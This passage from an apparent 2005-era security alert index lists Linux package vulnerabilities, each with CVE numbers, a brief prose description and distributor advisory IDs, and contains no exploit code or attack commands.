Fedora FEDORA-2005-497 2005-06-29
Gentoo 200506-01 2005-06-01
Trustix TSLSA-2005-0025 2005-05-31
Mandriva MDKSA-2005:095 2005-05-30
Ubuntu USN-136-2 2005-05-27
Ubuntu USN-136-1 2005-05-27
Ubuntu USN-135-1 2005-05-27
Gentoo 200505-15 2005-05-20

Comments (5 posted)

gtk-pixbuf, gtk2: denial of service

Package(s):gdk-pixbuf gtk2 CVE #(s):CAN-2005-0891
Created:March 30, 2005 Updated:December 19, 2005
Description: The BMP image processing code in gdk-pixbuf and gtk2 contains a denial of service vulnerability exploitable via a specially crafted image file.
Alerts:
Fedora-Legacy FLSA:155510 2005-12-17
Fedora-Legacy FLSA:154272 2005-07-15
SuSE SUSE-SR:2005:010 2005-04-08
Mandrake MDKSA-2005:069 2005-04-07
Mandrake MDKSA-2005:068 2005-04-07
Ubuntu USN-108-1 2005-04-05
Red Hat RHSA-2005:343-01 2005-04-05
Red Hat RHSA-2005:344-01 2005-04-01
Fedora FEDORA-2005-268 2005-03-30
Fedora FEDORA-2005-267 2005-03-30
Fedora FEDORA-2005-266 2005-03-30
Fedora FEDORA-2005-265 2005-03-30

Comments (none posted)

gedit: format string vulnerability

Package(s):gedit CVE #(s):CAN-2005-1686
Created:June 9, 2005 Updated:February 5, 2009
Description: A format string vulnerability has been discovered in gedit. Calling the program with specially crafted file names caused a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the gedit user.
Alerts:
Fedora FEDORA-2009-1189 2009-01-29
Fedora FEDORA-2009-1187 2009-01-29
Debian DSA-753-1 2005-07-12
Mandriva MDKSA-2005:102 2005-06-15
Red Hat RHSA-2005:499-01 2005-06-13
Gentoo 200506-09 2005-06-11
Ubuntu USN-138-1 2005-06-09

Comments (1 posted)

gettext: Insecure temporary file handling

Package(s):gettext CVE #(s):CAN-2004-0966
Created:October 11, 2004 Updated:March 1, 2006
Description: gettext insecurely creates temporary files in world-writeable directories with predictable names. A local attacker could create symbolic links in the temporary files directory, pointing to a valid file somewhere on the filesystem. When gettext is called, this would result in file access with the rights of the user running the utility, which could be the root user.
Alerts:
Mandriva MDKSA-2006:051 2006-02-28
Fedora-Legacy FLSA:136323 2006-01-09
Gentoo 200410-10:02 2004-10-10
OpenPKG OpenPKG-SA-2004.055 2004-12-23
Ubuntu USN-5-1 2004-10-27
Gentoo 200410-10 2004-10-10

Comments (1 posted)

glibc: tempfile vulnerability in catchsegv script

Package(s):glibc CVE #(s):CAN-2004-0968
Created:October 21, 2004 Updated:November 14, 2005
Description: The catchsegv script in the glibc package has a symlink vulnerability that may allow a local user to overwrite arbitrary files with the permissions of the user that is running the script.
Alerts:
Fedora-Legacy FLSA:152848 2005-11-13
Red Hat RHSA-2005:261-01 2005-04-28
Debian DSA-636-1 2005-01-12
Mandrake MDKSA-2004:159 2004-12-29
Red Hat RHSA-2004:586-01 2004-12-20
Fedora FEDORA-2004-356 2004-11-11
Ubuntu USN-4-1 2004-10-27
Gentoo 200410-19 2004-10-21

Comments (none posted)

gnump3d: cross-site scripting, directory traversal

Package(s):gnump3d CVE #(s):CVE-2005-3122 CVE-2005-3123
Created:October 28, 2005 Updated:November 7, 2005
Description: Steve Kemp discovered two vulnerabilities in gnump3d, a streaming server for MP3 and OGG files.
Alerts:
Gentoo 200511-05 2005-11-06
Debian DSA-877-1 2005-10-28

Comments (none posted)

grip: buffer overflow

Package(s):grip CVE #(s):CAN-2005-0706
Created:March 10, 2005 Updated:November 19, 2008
Description: Grip, a CD ripper, has a buffer overflow vulnerability that can occur when the CDDB server returns more than 16 matches.
Alerts:
Fedora FEDORA-2008-9604 2008-11-19
Fedora FEDORA-2008-9521 2008-11-19
Fedora-Legacy FLSA:152919 2005-09-15
Mandriva MDKSA-2005:074 2005-04-20
Mandriva MDKSA-2005:075 2005-04-20
Gentoo 200504-07 2005-04-08
Mandrake MDKSA-2005:066 2005-04-01
Red Hat RHSA-2005:304-01 2005-03-28
Gentoo 200503-21 2005-03-17
Fedora FEDORA-2005-203 2005-03-09
Fedora FEDORA-2005-202 2005-03-09

Comments (none posted)

groff: insecure temporary directory

Package(s):groff CVE #(s):CAN-2004-0969
Created:November 1, 2004 Updated:February 9, 2006
Description: Recently, Trustix Secure Linux discovered a vulnerability in the groff package. The utility "groffer" created a temporary directory in an insecure way, which allowed exploitation of a race condition to create or overwrite files with the privileges of the user invoking the program.
Alerts:
Mandriva MDKSA-2006:038 2006-02-08
Gentoo 200411-15 2004-11-08
Ubuntu USN-13-1 2004-11-01

Comments (none posted)

gzip: arbitrary command execution

Package(s):gzip CVE #(s):CAN-2005-0758
Created:August 1, 2005 Updated:January 10, 2007
Description: zgrep in gzip before 1.3.5 does not handle shell metacharacters like '|' and '&' properly when they occurred in input file names. This could be exploited to execute arbitrary commands with user privileges if zgrep is run in an untrusted directory with specially crafted file names.
Alerts:
OpenPKG OpenPKG-SA-2007.002 2007-01-08
Mandriva MDKSA-2006:027 2006-01-30
Mandriva MDKSA-2006:026 2006-01-30
Fedora-Legacy FLSA:158801 2005-11-14
Fedora-Legacy FLSA:157696 2005-08-10
Ubuntu USN-161-1 2005-08-04
Ubuntu USN-158-1 2005-08-01

Comments (2 posted)

htdig: cross site scripting

Package(s):htdig CVE #(s):CAN-2005-0085
Created:February 14, 2005 Updated:January 10, 2006
Description: Michael Krax discovered that ht://Dig fails to validate the 'config' parameter before displaying an error message containing the parameter. This flaw could allow an attacker to conduct cross-site scripting attacks.
Alerts:
Fedora-Legacy FLSA:152907 2006-01-09
Mandrake MDKSA-2005:063 2005-03-31
Red Hat RHSA-2005:090-01 2005-02-15
Debian DSA-680-1 2005-02-14
Gentoo 200502-16 2005-02-13

Comments (none posted)

imap: buffer overflow in c-client

Package(s):imap CVE #(s):CAN-2003-0297
Created:February 18, 2005 Updated:April 10, 2006
Description: A buffer overflow flaw was found in the c-client IMAP client. An attacker could create a malicious IMAP server that if connected to by a victim could execute arbitrary code on the client machine.
Alerts:
Fedora-Legacy FLSA:184074 2006-04-04
Fedora-Legacy FLSA:152912 2005-05-12
Red Hat RHSA-2005:114-01 2005-02-18

Comments (none posted)

junkbuster: heap corruption and settings modification

Package(s):junkbuster CVE #(s):CVE-2005-1108 CVE-2005-1109
Created:April 13, 2005 Updated:November 5, 2005
Description: JunkBuster through version 2.02-r2 contains two vulnerabilities: a heap corruption bug and a possible privacy violation.
Alerts:
Debian DSA-713-1 2005-04-21
Gentoo 200504-11 2005-04-13

Comments (1 posted)

kdebase: local root vulnerability

Package(s):kdebase CVE #(s):CAN-2005-2494
Created:September 7, 2005 Updated:August 11, 2006
Description: The kdebase package (and kcheckpass in particular) found in KDE versions 3.2.0 through 3.4.2 suffers from a lock file handling error which can enable a local attacker to obtain root access. See this advisory for details.
Alerts:
Red Hat RHSA-2006:0582-01 2006-08-10
Debian DSA-815-1 2005-09-16
Slackware SSA:2005-251-01 2005-09-09
Ubuntu USN-176-1 2005-09-07
Mandriva MDKSA-2005:160 2005-09-06

Comments (none posted)

kdelibs: kate backup file permission leak

Package(s):kdelibs kate kwrite CVE #(s):CAN-2005-1920
Created:July 19, 2005 Updated:September 21, 2010
Description: Kate / Kwrite, as shipped with KDE 3.2.x up to including 3.4.0, creates a file backup before saving a modified file. These backup files are created with default permissions, even if the original file had more strict permissions set. See this advisory for more information.
Alerts:
Gentoo 200611-21 2006-11-27
Debian DSA-804-2 2005-11-10
Debian DSA-804-1 2005-09-08
Red Hat RHSA-2005:612-01 2005-07-27
Ubuntu USN-150-1 2005-07-21
Mandriva MDKSA-2005:122 2005-07-20
Fedora FEDORA-2005-594 2005-07-19

Comments (1 posted)

kernel: multiple vulnerabilities

Package(s):kernel CVE #(s):CAN-2005-0449 CAN-2005-0209 CAN-2005-0529 CAN-2005-0530 CAN-2005-0532 CAN-2005-0384 CAN-2005-0210 CAN-2005-0504 CAN-2005-0003
Created:March 24, 2005 Updated:May 31, 2006
Description: A number of vulnerabilities have been found in the Linux kernel, including a PPP-related denial of service problem, an integer overflow in the epoll() code, memory corruption in the ELF loader, and exploitable overflows in the ISO9660 code.
Alerts:
Debian DSA-1082-1 2006-05-29
Debian DSA-1069-1 2006-05-20
Debian DSA-1070-1 2006-05-21
Debian DSA-1067-1 2006-05-20
Conectiva CLA-2005:945 2005-03-31
Fedora FEDORA-2005-262 2005-03-28
SuSE SUSE-SA:2005:018 2005-03-24

Comments (none posted)

koffice: KWord RTF import buffer overflow

Package(s):koffice CVE #(s):CAN-2005-2971
Created:October 12, 2005 Updated:November 7, 2005
Description: The KOffice RTF import module suffers from a buffer overflow vulnerability which could be exploited via a malicious RTF file. See the KDE advisory for details.
Alerts:
Slackware SSA:2005-310-02 2005-11-07
Debian DSA-872-1 2005-10-26
Mandriva MDKSA-2005:185 2005-10-14
Fedora FEDORA-2005-984 2005-10-13
Gentoo 200510-12 2005-10-14
Ubuntu USN-202-1 2005-10-12

Comments (none posted)

krb5: double-free flaw

Package(s):krb5 CVE #(s):CAN-2004-0175 CAN-2005-0488 CAN-2005-1175 CAN-2005-1689
Created:July 12, 2005 Updated:December 6, 2005
Description: The krb5 authentication has a double-free flaw which may be initiated by a remote unauthenticated attacker. Also, a single byte heap overflow in the krb5_unparse_name() function can lead to a denial of service and an information disclosure may be caused by a malicious telnet server. See This report for more information.
Alerts:
Ubuntu USN-224-1 2005-12-06
Debian DSA-757-1 2005-07-17
Trustix TSLSA-2005-0036 2005-07-14
Mandriva MDKSA-2005:119 2005-07-13
SuSE SUSE-SR:2005:017 2005-07-13
Gentoo 200507-11 2005-07-12
Fedora FEDORA-2005-553 2005-07-12
Red Hat RHSA-2005:562-01 2005-07-12
Fedora FEDORA-2005-552 2005-07-12
Red Hat RHSA-2005:567-02 2005-07-12

Comments (none posted)

libconvert-uulib-perl: arbitrary code execution

Package(s):libconvert-uulib-perl CVE #(s):CAN-2005-1349
Created:May 20, 2005 Updated:January 27, 2006
Description: Mark Martinec and Robert Lewis discovered a buffer overflow in Convert::UUlib (before 1.051), a Perl interface to the uulib library, which may result in the execution of arbitrary code.
Alerts:
Mandriva MDKSA-2006:022 2006-01-26
Debian DSA-727-1 2005-05-20

Comments (1 posted)

libdbi-perl: insecure temporary file

Package(s):libdbi-perl CVE #(s):CAN-2005-0077
Created:January 25, 2005 Updated:March 2, 2006
Description: Javier Fernández-Sanguino Peña from the Debian Security Audit Project discovered that the DBI library, the Perl5 database interface, creates a temporary PID file in an insecure manner. This can be exploited by a malicious user to overwrite arbitrary files owned by the person executing the parts of the library.
Alerts:
Fedora-Legacy FLSA:178989 2006-03-01
Gentoo 200501-38:03 2005-01-26
Red Hat RHSA-2005:072-01 2005-02-15
Mandrake MDKSA-2005:030 2005-02-08
Red Hat RHSA-2005:069-01 2005-02-01
Gentoo 200501-38 2005-01-26
Ubuntu USN-70-1 2005-01-25
Debian DSA-658-1 2005-01-25

Comments (none posted)

libgadu: memory alignment bug

Package(s):libgadu CVE #(s):CAN-2005-2370
Created:July 29, 2005 Updated:June 25, 2007
Description: Szymon Zygmunt and Michal Bartoszkiewicz discovered a memory alignment error in libgadu (from ekg, console Gadu Gadu client, an instant messaging program) which is included in gaim, a multi-protocol instant messaging client, as well. This can not be exploited on the x86 architecture but on others, e.g. on Sparc and lead to a bus error, in other words a denial of service.
Alerts:
Debian DSA-813-1 2005-09-15
Red Hat RHSA-2005:627-01 2005-08-09
Debian DSA-769-1 2005-07-29

Comments (none posted)

libgd2: buffer overflows in PNG handling

Package(s):libgd2 CVE #(s):CAN-2004-0990 CAN-2004-0941
Created:October 29, 2004 Updated:June 28, 2006
Description: Several buffer overflows have been discovered in libgd's PNG handling functions.
If an attacker tricked a user into loading a malicious PNG image, they could leverage this into executing arbitrary code in the context of the user opening image. Most importantly, this library is commonly used in PHP. One possible target would be a PHP driven photo website that lets users upload images. Therefore this vulnerability might lead to privilege escalation to a web server's privileges.
Multiple buffer overflows in the gd graphics library (libgd) 2.0.21 and earlier may allow remote attackers to execute arbitrary code via malformed image files that trigger the overflows due to improper calls to the gdMalloc function.
Alerts:
Mandriva MDKSA-2006:114 2006-06-27
Red Hat RHSA-2006:0194-01 2006-02-01
Fedora-Legacy FLSA:152838 2005-07-15
Red Hat RHSA-2004:638-01 2004-12-17
Ubuntu USN-33-1 2004-11-29
Debian DSA-602-1 2004-11-29
Debian DSA-601-1 2004-11-29
Mandrake MDKSA-2004:132 2004-11-15
Ubuntu USN-25-1 2004-11-15
Fedora FEDORA-2004-412 2004-11-11
Fedora FEDORA-2004-411 2004-11-11
Ubuntu USN-21-1 2004-11-09
Debian DSA-591-1 2004-11-09
Debian DSA-589-1 2004-11-09
Gentoo 200411-08 2004-11-03
OpenPKG OpenPKG-SA-2004.049 2004-10-30
Ubuntu USN-11-1 2004-10-28

Comments (none posted)

libgda2: format string vulnerabilities

Package(s):libgda2 CVE #(s):CAN-2005-2958
Created:October 25, 2005 Updated:November 18, 2005
Description: Steve Kemp discovered two format string vulnerabilities in libgda2, the GNOME Data Access library for GNOME2, which may lead to the execution of arbitrary code in programs that use this library.
Alerts:
SuSE SUSE-SR:2005:027 2005-11-11
Fedora FEDORA-2005-1029 2005-11-07
Mandriva MDKSA-2005:203 2005-11-01
Gentoo 200511-01 2005-11-02
Ubuntu USN-212-1 2005-10-28
Debian DSA-871-2 2005-10-25
Debian DSA-871-1 2005-10-25

Comments (none posted)

libnet-ssleay-perl: weakened cryptographic operations

Package(s):libnet-ssleay-perl CVE #(s):CAN-2005-0106
Created:May 3, 2005 Updated:January 27, 2006
Description: Javier Fernandez-Sanguino Pena discovered that this library used the file /tmp/entropy as a fallback entropy source if a proper source was not set in the environment variable EGD_PATH. This can potentially lead to weakened cryptographic operations if an attacker provides a /tmp/entropy file with known content.
Alerts:
Mandriva MDKSA-2006:023 2006-01-26
Ubuntu USN-113-1 2005-05-03

Comments (none posted)

libpam-ldap: authentication bypass

Package(s):libpam-ldap CVE #(s):CAN-2005-2641
Created:August 25, 2005 Updated:October 6, 2006
Description: libpam-ldap, the PAM LDAP interface, has a vulnerability in which it fails to authenticate with an LDAP server which is not configured properly, allowing an authentication bypass.
Alerts:
rPath rPSA-2006-0183-1 2006-10-05
Mandriva MDKSA-2005:190 2005-10-20
Gentoo 200508-22 2005-08-31
Debian DSA-785-1 2005-08-25

Comments (none posted)

libTIFF: buffer overflow

Package(s):libtiff CVE #(s):CAN-2005-1544
Created:May 10, 2005 Updated:February 18, 2006
Description: Tavis Ormandy of the Gentoo Linux Security Audit Team discovered a stack based buffer overflow in the libTIFF library when reading a TIFF image with a malformed BitsPerSample tag. Successful exploitation would require the victim to open a specially crafted TIFF image, resulting in the execution of arbitrary code.
Alerts:
Mandriva MDKSA-2006:042 2006-02-17
Debian DSA-755-1 2005-07-13
Ubuntu USN-130-1 2005-05-19
Gentoo 200505-07 2005-05-10

Comments (1 posted)

libxml2 - arbitrary code execution

Package(s):libxml2 CVE #(s):CAN-2004-0110
Created:February 26, 2004 Updated:August 19, 2009
Description: Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. When fetching a remote resource via FTP or HTTP, libxml2 uses special parsing routines. These routines can overflow a buffer if passed a very long URL. If an attacker is able to find an application using libxml2 that parses remote resources and allows them to influence the URL, then this flaw could be used to execute arbitrary code.
Alerts:
Fedora FEDORA-2009-8594 2009-08-15
Fedora FEDORA-2009-8582 2009-08-15
Fedora-Legacy FLSA:1324 2004-07-19
Conectiva CLA-2004:836 2004-03-31
Gentoo 200403-01 2004-03-06
Trustix TSLSA-2004-0010 2004-03-05
OpenPKG OpenPKG-SA-2004.003 2004-03-05
Netwosix NW-2004-0004 2004-03-04
Debian DSA-455-1 2004-03-03
Mandrake MDKSA-2004:018 2004-03-03
Red Hat RHSA-2004:091-02 2004-03-03
Whitebox WBSA-2004:090-01 2004-03-01
Red Hat RHSA-2004:090-01 2004-02-26
Fedora FEDORA-2004-087 2004-02-25
Red Hat RHSA-2004:091-01 2004-02-26

Comments (none posted)

libxml2: multiple buffer overflows

Package(s):libxml2 CVE #(s):CAN-2004-0989
Created:October 28, 2004 Updated:August 19, 2009
Description: libxml2 prior to version 2.6.14 has multiple buffer overflow vulnerabilities, if a local user passes a specially crafted FTP URL, arbitrary code may be executed.
Alerts:
Fedora FEDORA-2009-8594 2009-08-15
Fedora FEDORA-2009-8582 2009-08-15
Ubuntu USN-89-1 2005-02-28
Red Hat RHSA-2004:650-01 2004-12-16
Conectiva CLA-2004:890 2004-11-18
Red Hat RHSA-2004:615-01 2004-11-12
Mandrake MDKSA-2004:127 2004-11-04
Debian DSA-582-1 2004-11-02
Gentoo 200411-05 2004-11-02
Trustix TSLSA-2004-0055 2004-10-29
OpenPKG OpenPKG-SA-2004.050 2004-10-31
Ubuntu USN-10-1 2004-10-28
Fedora FEDORA-2004-353 2004-10-28

Comments (none posted)

libXpm: new buffer overflows

Package(s):libXpm CVE #(s):CAN-2005-0605
Created:March 4, 2005 Updated:March 8, 2006
Description: A new vulnerability has been discovered in libXpm, which is included in OpenMotif and LessTif, that can potentially lead to remote code execution.
Alerts:
Fedora-Legacy FLSA:168264 2006-03-07
Fedora-Legacy FLSA:152803 2006-01-09
Fedora FEDORA-2005-815 2005-08-26
Fedora FEDORA-2005-808 2005-08-25
Red Hat RHSA-2005:198-01 2005-06-08
Red Hat RHSA-2005:473-01 2005-05-24
Red Hat RHSA-2005:412-01 2005-05-11
Debian DSA-723-1 2005-05-09
Mandriva MDKSA-2005:081 2005-05-05
Mandriva MDKSA-2005:080 2005-04-28
Red Hat RHSA-2005:044-01 2005-04-06
Red Hat RHSA-2005:331-01 2005-03-30
Fedora FEDORA-2005-273 2005-03-29
Fedora FEDORA-2005-272 2005-03-29
Ubuntu USN-97-1 2005-03-16
Gentoo 200503-15 2005-03-12
Ubuntu USN-92-1 2005-03-07
Gentoo 200503-08 2005-03-04

Comments (none posted)

lm-sensors: insecure temp files

Package(s):lm-sensors CVE #(s):CAN-2005-2672
Created:August 23, 2005 Updated:November 10, 2005
Description: Javier Fernández-Sanguino Peña noticed that the pwmconfig script created temporary files in an insecure manner. This could allow a symlink attack to create or overwrite arbitrary files with full root privileges since pwmconfig is usually executed by root.
Alerts:
Red Hat RHSA-2005:825-01 2005-11-10
Fedora FEDORA-2005-1054 2005-11-07
Fedora FEDORA-2005-1053 2005-11-07
Debian-Testing DTSA-17-1 2005-09-15
Debian DSA-814-1 2005-09-15
Gentoo 200508-19 2005-08-30
Mandriva MDKSA-2005:149 2005-08-25
Ubuntu USN-172-1 2005-08-23

Comments (1 posted)

lynx: stack overflow

Package(s):lynx CVE #(s):CAN-2005-3120
Created:October 17, 2005 Updated:November 7, 2005
Description: Ulf Harnhammar discovered a stack overflow bug in Lynx when handling connections to NNTP (news) servers. An attacker could create a web page redirecting to a malicious news server which could execute arbitrary code as the user running lynx.
Alerts:
Slackware SSA:2005-310-03 2005-11-07
Ubuntu USN-206-2 2005-10-29
Mandriva MDKSA-2005:186-1 2005-10-26
Debian DSA-876-1 2005-10-27
Debian DSA-874-1 2005-10-27
Mandriva MDKSA-2005:186 2005-10-17
Fedora FEDORA-2005-994 2005-10-17
Fedora FEDORA-2005-993 2005-10-17
Gentoo 200510-15 2005-10-17
Ubuntu USN-206-1 2005-10-17
Red Hat RHSA-2005:803-01 2005-10-17

Comments (none posted)

Mantis: multiple vulnerabilities

Package(s):mantisbt CVE #(s):CVE-2005-3091 CVE-2005-3335 CVE-2005-3336 CVE-2005-3338 CVE-2005-3339
Created:October 28, 2005 Updated:December 22, 2005
Description: Mantis contains several vulnerabilities, including a remote file inclusion vulnerability, an SQL injection vulnerability, multiple cross site scripting vulnerabilities and multiple information disclosure vulnerabilities.
Alerts:
Gentoo 200512-12 2005-12-22
Debian DSA-905-1 2005-11-22
Gentoo 200510-24 2005-10-28

Comments (none posted)

mod_python: remote access vulnerability

Package(s):mod_python CVE #(s):CAN-2005-0088
Created:February 10, 2005 Updated:April 10, 2006
Description: mod_python has a vulnerability in the publisher handler that may allow a remote user to use a specially crafted URL to allow access to objects that should be protected. An information leak can result.
Alerts:
Fedora-Legacy FLSA:152896 2006-04-04
Conectiva CLA-2005:926 2005-03-02
Debian DSA-689-1 2005-02-23
Red Hat RHSA-2005:100-01 2005-02-15
Gentoo 200502-14 2005-02-13
Trustix TSLSA-2005-0003 2005-02-11
Ubuntu USN-80-1 2005-02-11
Red Hat RHSA-2005:104-01 2005-02-10
Fedora FEDORA-2005-140 2005-02-10
Fedora FEDORA-2005-139 2005-02-10

Comments (none posted)

mysql: buffer overflow

Package(s):mysql CVE #(s):CAN-2005-2558
Created:September 12, 2005 Updated:January 12, 2006
Description: The mysql CREATE FUNCTION can be used to create a buffer overflow. A specially crafted long function name can be used by a local attacker to crash the server or execute arbitrary code with the privileges of the server.
Alerts:
Fedora-Legacy FLSA:167803 2006-01-10
Ubuntu USN-180-2 2005-12-05
OpenPKG OpenPKG-SA-2005.024 2005-12-03
Debian DSA-833-2 2005-10-04
Debian DSA-833-1 2005-10-01
Debian DSA-831-1 2005-09-30
Debian DSA-829-1 2005-09-30
Mandriva MDKSA-2005:163 2005-09-12
Ubuntu USN-180-1 2005-09-12

Comments (none posted)

mysql: low-impact security fix

Package(s):mysql CVE #(s):CAN-2005-1636
Created:July 20, 2005 Updated:February 22, 2006
Description: An update to MySQL version 4.1.12 fixes a low-impact security problem (bz#158689).
Alerts:
Mandriva MDKSA-2006:045 2006-02-21
Red Hat RHSA-2005:685-01 2005-10-05
Debian DSA-783-1 2005-08-24
Fedora FEDORA-2005-557 2005-07-20

Comments (1 posted)

ncpfs: multiple vulnerabilities

Package(s):ncpfs CVE #(s):CAN-2005-0013 CAN-2005-0014
Created:January 31, 2005 Updated:May 15, 2006
Description: Erik Sjolund discovered two vulnerabilities in the programs bundled with ncpfs: there is a potentially exploitable buffer overflow in ncplogin (CAN-2005-0014), and due to a flaw in nwclient.c, utilities using the NetWare client functions insecurely access files with elevated privileges (CAN-2005-0013).
Alerts:
Fedora-Legacy FLSA:152904 2006-05-12
Fedora FEDORA-2005-435 2005-08-16
Red Hat RHSA-2005:371-01 2005-05-17
Mandrake MDKSA-2005:028 2005-02-01
Gentoo 200501-44 2005-01-30

Comments (none posted)

nfs-utils: arbitrary code execution

Package(s):nfs-utils CVE #(s):CAN-2004-0946
Created:January 11, 2005 Updated:February 27, 2006
Description: Arjan van de Ven discovered a buffer overflow in rquotad on 64bit architectures; an improper integer conversion could lead to a buffer overflow. An attacker with access to an NFS share could send a specially crafted request which could then lead to the execution of arbitrary code.
Alerts:
Fedora-Legacy FLSA:138098 2006-02-25
Red Hat RHSA-2005:014-01 2005-01-12
Mandrake MDKSA-2005:005 2005-01-11

Comments (none posted)

ntp: uses wrong gid

Package(s):ntp CVE #(s):CAN-2005-2496
Created:August 26, 2005 Updated:August 11, 2006
Description: When starting xntpd with the -u option and specifying the group by using a string not a numeric gid the daemon uses the gid of the user not the group. This problem is now fixed by this update.
Alerts:
Red Hat RHSA-2006:0393-01 2006-08-10
Mandriva MDKSA-2005:156 2005-09-06
Debian DSA-801-1 2005-09-05
Ubuntu USN-175-1 2005-09-01
Fedora FEDORA-2005-812 2005-08-26

Comments (none posted)

openssh: GSSAPI credential disclosure

Package(s):openssh CVE #(s):CAN-2005-2798
Created:September 7, 2005 Updated:February 3, 2006
Description: OpenSSH prior to version 4.2 will allow GSSAPI credentials to be delegated to users who are not using GSSAPI authentication, possibly leading to the unwanted disclosure of those credentials. OpenSSH 4.2 has the fix.
Alerts:
SuSE SUSE-SR:2006:003 2006-02-03
Ubuntu USN-209-1 2005-10-17
Mandriva MDKSA-2005:172 2005-10-06
Red Hat RHSA-2005:527-01 2005-10-05
Fedora FEDORA-2005-860 2005-09-12
Trustix TSLSA-2005-0047 2005-09-09
Fedora FEDORA-2005-858 2005-09-07

Comments (none posted)

openssl: protocol rollback

Package(s):openssl CVE #(s):CAN-2005-2969
Created:October 12, 2005 Updated:December 19, 2005
Description: OpenSSL prior to version 0.9.7h or 0.9.8a contains a vulnerability which could enable an attacker to force the use of the older, less secure SSL 2.0 protocol. See this advisory for details or this analysis for even more details.
Alerts:
Fedora-Legacy FLSA:166939 2005-12-17
Debian DSA-888-1 2005-11-07
Debian DSA-882-1 2005-11-04
Debian DSA-881-1 2005-11-04
Debian DSA-875-1 2005-10-27
SuSE SUSE-SA:2005:061 2005-10-19
OpenPKG OpenPKG-SA-2005.022 2005-10-17
Fedora FEDORA-2005-986 2005-10-13
Fedora FEDORA-2005-985 2005-10-13
Ubuntu USN-204-1 2005-10-14
Slackware SSA:2005-286-01 2005-10-14
Mandriva MDKSA-2005:179 2005-10-11
Gentoo 200510-11 2005-10-12
Red Hat RHSA-2005:800-01 2005-10-11

Comments (1 posted)

OpenSSL: denial of service vulnerabilities

Package(s):OpenSSL CVE #(s):CAN-2004-0081 CAN-2003-0851
Created:March 17, 2004 Updated:November 2, 2005
Description: Versions 0.9.7a-c of the OpenSSL library suffer from two denial of service vulnerabilities; see the version 0.9.7d release announcement for details.
Alerts:
Red Hat RHSA-2005:830-00 2005-11-02
Red Hat RHSA-2005:829-00 2005-11-02
Fedora FEDORA-2005-1042 2005-10-31
Fedora-Legacy FLSA:1395 2004-05-08
Conectiva CLA-2004:834 2004-03-31
Whitebox WBSA-2004:084-01 2004-03-23
Red Hat RHSA-2004:084-01 2004-03-23
Fedora FEDORA-2004-095 2004-03-19
Whitebox WBSA-2004:120-01 2004-03-22
Trustix TSLSA-2004-0012 2004-03-17
Slackware SSA:2004-077-01 2004-03-17
Red Hat RHSA-2004:121-01 2004-03-17
OpenPKG OpenPKG-SA-2004.007 2004-03-18
Gentoo 200403-03 2004-03-17
Debian DSA-465-1 2004-03-17
Netwosix NW-2004-0005 2004-03-17
Mandrake MDKSA-2004:023 2004-03-17
SuSE SuSE-SA:2004:007 2004-03-17
Red Hat RHSA-2004:120-01 2004-03-17
Red Hat RHSA-2004:119-01 2004-03-17
EnGarde ESA-20040317-003 2004-03-17

Comments (1 posted)

openvpn: format string vulnerability

Package(s):openvpn CVE #(s):CVE-2005-3393 CVE-2005-3409
Created:November 2, 2005 Updated:December 12, 2005
Description: OpenVPN 2.0.x contains a format string vulnerability which can be exploited by a hostile server; see this advisory for details.
Alerts:
Mandriva MDKSA-2005:206-1 2005-12-09
Mandriva MDKSA-2005:206 2005-11-08
Debian DSA-885-1 2005-11-07
Gentoo 200511-07 2005-11-06
SuSE SUSE-SR:2005:025 2005-11-04
OpenPKG OpenPKG-SA-2005.023 2005-11-02

Comments (none posted)

pcre3: arbitrary code execution

Package(s):pcre3 CVE #(s):CAN-2005-2491
Created:August 23, 2005 Updated:March 10, 2006
Description: A buffer overflow has been discovered in the PCRE, a widely used library that provides Perl compatible regular expressions. Specially crafted regular expressions triggered a buffer overflow. On systems that accept arbitrary regular expressions from untrusted users, this could be exploited to execute arbitrary code with the privileges of the application using the library.
Alerts:
Red Hat RHSA-2006:0197-01 2006-03-09
Fedora-Legacy FLSA:168516 2006-03-07
Debian DSA-821-1 2005-09-28
Debian DSA-819-1 2005-09-23
Debian DSA-817-1 2005-09-22
Gentoo 200509-08 2005-09-12
Red Hat RHSA-2005:358-01 2005-09-08
Red Hat RHSA-2005:761-02 2005-09-08
Trustix TSLSA-2005-0045 2005-08-26
OpenPKG OpenPKG-SA-2005.018 2005-09-05
SuSE SUSE-SA:2005:051 2005-09-05
Gentoo 200509-02 2005-09-03
Debian DSA-800-1 2005-09-02
Ubuntu USN-173-4 2005-08-31
Slackware SSA:2005-242-01 2005-08-31
SuSE SUSE-SA:2005:049 2005-08-30
SuSE SUSE-SA:2005:048 2005-08-30
Ubuntu USN-173-3 2005-08-30
Mandriva MDKSA-2005:155 2005-08-29
Mandriva MDKSA-2005:154 2005-08-26
Mandriva MDKSA-2005:153 2005-08-26
Mandriva MDKSA-2005:151 2005-08-25
Mandriva MDKSA-2005:152 2005-08-25
Gentoo 200508-17 2005-08-25
Ubuntu USN-173-2 2005-08-24
Fedora FEDORA-2005-803 2005-08-24
Fedora FEDORA-2005-802 2005-08-24
Ubuntu USN-173-1 2005-08-23

Comments (none posted)

perl: setuid vulnerabilities

Package(s):perl CVE #(s):CAN-2005-0155 CAN-2005-0156
Created:February 2, 2005 Updated:August 11, 2006
Description: There are two vulnerabilities with perl when it is used in a setuid mode. The PERLIO_DEBUG environment variable can be used to overwrite arbitrary files; there is also an associated buffer overflow which can be exploited to gain root access.
Alerts:
Red Hat RHSA-2006:0605-01 2006-08-10
Fedora FEDORA-2005-353 2005-05-02
Red Hat RHSA-2005:103-01 2005-02-15
Gentoo 200502-13 2005-02-11
SuSE SUSE-SR:2005:004 2005-02-11
Mandrake MDKSA-2005:031 2005-02-08
Red Hat RHSA-2005:105-01 2005-02-07
Ubuntu USN-72-1 2005-02-02

Comments (none posted)

perl: symlink vulnerability

Package(s):perl CVE #(s):CAN-2005-0448
Created:March 9, 2005 Updated:January 30, 2006
Description: The rmtree() function in the File:Path.pm module has a symlink vulnerability which could be exploited to create setuid binaries.
Alerts:
Fedora-Legacy FLSA:152845 2006-01-24
Red Hat RHSA-2005:674-01 2005-10-05
Fedora FEDORA-2005-600 2005-07-22
Mandriva MDKSA-2005:079 2005-04-28
Debian DSA-696-1 2005-03-22
Ubuntu USN-94-1 2005-03-09

Comments (none posted)

phpMyAdmin: local file inclusion and XSS

Package(s):phpmyadmin CVE #(s):CVE-2005-2869 CVE-2005-3300 CVE-2005-3301
Created:October 25, 2005 Updated:November 18, 2005
